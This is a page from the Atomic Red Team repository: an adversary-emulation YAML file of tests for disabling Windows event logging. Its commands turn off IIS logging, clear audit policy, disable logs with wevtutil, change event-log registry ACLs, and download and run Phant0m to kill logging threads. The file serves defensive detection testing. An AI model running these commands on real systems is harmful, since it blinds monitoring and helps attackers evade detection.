security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1562.002/T1562.002.yaml
T
Atomic Red Team doc generator 01e281aad2 Generated docs from job=generate-docs branch=master [ci skip]
2024-12-11 00:47:02 +00:00

208 lines
10 KiB
YAML
Raw Permalink Blame History

attack_technique: T1562.002
display_name: 'Impair Defenses: Disable Windows Event Logging'
atomic_tests:
- name: Disable Windows IIS HTTP Logging
auto_generated_guid: 69435dcf-c66f-4ec0-a8b1-82beb76b34db
description: |
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
This action requires HTTP logging configurations in IIS to be unlocked.
Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)
supported_platforms:
- windows
input_arguments:
website_name:
description: The name of the website on a server
type: string
default: Default Web Site
executor:
command: |
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
cleanup_command: |
if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null
}
name: powershell
- name: Disable Windows IIS HTTP Logging via PowerShell
auto_generated_guid: a957fb0f-1e85-49b2-a211-413366784b1e
description: |
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
This action requires HTTP logging configurations in IIS to be unlocked.
Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)
supported_platforms:
- windows
input_arguments:
website_name:
description: The name of the website on a server
type: string
default: Default Web Site
executor:
command: |
set-WebConfigurationProperty -PSPath "IIS:\Sites\#{website_name}\" -filter "system.webServer/httpLogging" -name dontLog -value $true
cleanup_command: |
if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null
}
name: powershell
- name: Kill Event Log Service Threads
auto_generated_guid: 41ac52ba-5d5e-40c0-b267-573ed90489bd
description: 'Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html'
supported_platforms:
- windows
executor:
command: |
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
$url = "https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/f1396c411a867e1b471ef80c5c534466103440e0/Invoke-Phant0m.ps1"
$output = "$env:TEMP\Invoke-Phant0m.ps1"
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $output)
cd $env:TEMP
Import-Module .\Invoke-Phant0m.ps1
Invoke-Phant0m
cleanup_command: |
Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS" -fore red
Remove-Item "$env:TEMP\Invoke-Phant0m.ps1" -ErrorAction Ignore
name: powershell
elevation_required: true
- name: 'Impair Windows Audit Log Policy'
auto_generated_guid: 5102a3a7-e2d7-4129-9e45-f483f2e0eea8
description: >-
Disables the windows audit policy to prevent key host based telemetry being
written into the event logs.
[Solarigate example](https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/)
supported_platforms:
- windows
executor:
command: |
auditpol /set /category:"Account Logon" /success:disable /failure:disable
auditpol /set /category:"Logon/Logoff" /success:disable /failure:disable
auditpol /set /category:"Detailed Tracking" /success:disable
cleanup_command: |
auditpol /set /category:"Account Logon" /success:enable /failure:enable
auditpol /set /category:"Detailed Tracking" /success:enable
auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable
name: command_prompt
elevation_required: true
- name: 'Clear Windows Audit Policy Config'
auto_generated_guid: 913c0e4e-4b37-4b78-ad0b-90e7b25010f6
description: >-
Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log.
supported_platforms:
- windows
executor:
command: |
auditpol /clear /y
auditpol /remove /allusers
cleanup_command: |
auditpol /set /category:"Account Logon" /success:enable /failure:enable
auditpol /set /category:"Detailed Tracking" /success:enable
auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable
name: command_prompt
elevation_required: true
- name: Disable Event Logging with wevtutil
auto_generated_guid: b26a3340-dad7-4360-9176-706269c74103
description: |
Wevtutil can be used to disable logs.
NOTE: RansomEXX ransomware uses this to disable Security logs post-encryption.
supported_platforms:
- windows
input_arguments:
log_name:
description: Name of the log to be disabled
type: string
default: Microsoft-Windows-IKE/Operational
executor:
command: |
wevtutil sl "#{log_name}" /e:false
cleanup_command: |
wevtutil sl "#{log_name}" /e:true
name: command_prompt
- name: 'Makes Eventlog blind with Phant0m'
auto_generated_guid: 3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741
description: |
Use [Phant0m](https://github.com/hlldz/Phant0m) to disable Eventlog
supported_platforms:
- windows
input_arguments:
file_name:
description: exe version of Phant0m
type: path
default: PathToAtomicsFolder\T1562.002\bin\Phant0m.exe
dependency_executor_name: powershell
dependencies:
- description: |
Phant0m.exe must exist on disk at specified location (#{file_name})
prereq_command: |
if (Test-Path "#{file_name}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "#{file_name}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing
executor:
command: |
"#{file_name}"
cleanup_command: |
echo "Sorry you have to reboot"
name: command_prompt
- name: Modify Event Log Channel Access Permissions via Registry - PowerShell
auto_generated_guid: 8e81d090-0cd6-4d46-863c-eec11311298f
description: |-
This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
supported_platforms:
- windows
input_arguments:
ChannelPath:
type: string
default: HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-TaskScheduler/Operational
description: Path to the event log service channel to alter
executor:
command: |-
Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:SYG:SYD:(D;;0x1;;;WD)"
Restart-Service -Name EventLog -Force -ErrorAction Ignore
cleanup_command: |-
Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:BAG:SYD:(A;;0x2;;;S-1-15-2-1)(A;;0x2;;;S-1-15-3-1024-3153509613-960666767-3724611135-2725662640-12138253-543910227-1950414635-4190290187)(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x7;;;SO)(A;;0x3;;;IU)(A;;0x3;;;SU)(A;;0x3;;;S-1-5-3)(A;;0x3;;;S-1-5-33)(A;;0x1;;;S-1-5-32-573)"
Restart-Service -Name EventLog -Force -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell
auto_generated_guid: 85e6eff8-3ed4-4e03-ae50-aa6a404898a5
description: |-
This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
supported_platforms:
- windows
input_arguments:
ChannelPath:
type: string
default: HKLM:\SOFTWARE\Policies\Microsoft\Windows\EventLog\Setup
description: Path to the event log service channel to alter
executor:
command: |-
New-Item -Path #{ChannelPath} -Force
Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:SYG:SYD:(D;;0x1;;;WD)"
Restart-Service -Name EventLog -Force -ErrorAction Ignore
cleanup_command: |-
Remove-Item -Path #{ChannelPath} -Force
Restart-Service -Name EventLog -Force -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Modify Event Log Access Permissions via Registry - PowerShell
auto_generated_guid: a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1
description: |-
This test simulates an adversary modifying access permissions for a Windows Event Log channel by setting the "CustomSD" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
supported_platforms:
- windows
input_arguments:
CustomSDPath:
type: string
default: HKLM:\SYSTEM\CurrentControlSet\Services\EventLog\System
description: Path to the event log service channel to alter
executor:
command: 'Set-ItemProperty -Path #{CustomSDPath} -Name "CustomSD" -Value "O:SYG:SYD:(D;;0x1;;;WD)"'
cleanup_command: 'Remove-ItemProperty -Path #{CustomSDPath} -Name "CustomSD"'
name: powershell
elevation_required: true
Reference in New Issue View Git Blame Copy Permalink